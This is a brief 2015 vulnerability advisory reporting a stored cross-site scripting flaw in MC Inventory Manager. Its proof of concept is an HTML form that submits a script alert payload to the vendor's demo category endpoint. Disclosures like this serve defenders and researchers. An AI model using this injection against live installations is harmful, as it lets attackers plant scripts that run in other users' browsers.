MC Inventory Manager Cross Site Scripting
Posted on 15 October 2015
Vulnerability title: MC Inventory Manager Stored Cross Site Scripting Exploit Author : Ashiyane Digital Security Team Product: MC Inventory Manager Date: 2015/10/13 Vendor Homepage: http://microcode.ws/inventory-manager.php Introduction: ============= Manage and maintain inventory of your company, items, sales, orders, customers and suppliers. MC Inventory Manager suffer from a cross site scripting vulnerability. PoC: === <forM Action="http://microcode.ws/demo/inventory/functions/add_cat.php" method="post"> <input type="HIDDEN" name="cat" value='<script>alert(/Ehsan Ice/)</script>'> <input type="submit" value="submit"> </form> Discovered By: ============= Ehasn Hosseini (hehsan979@gmail.com)
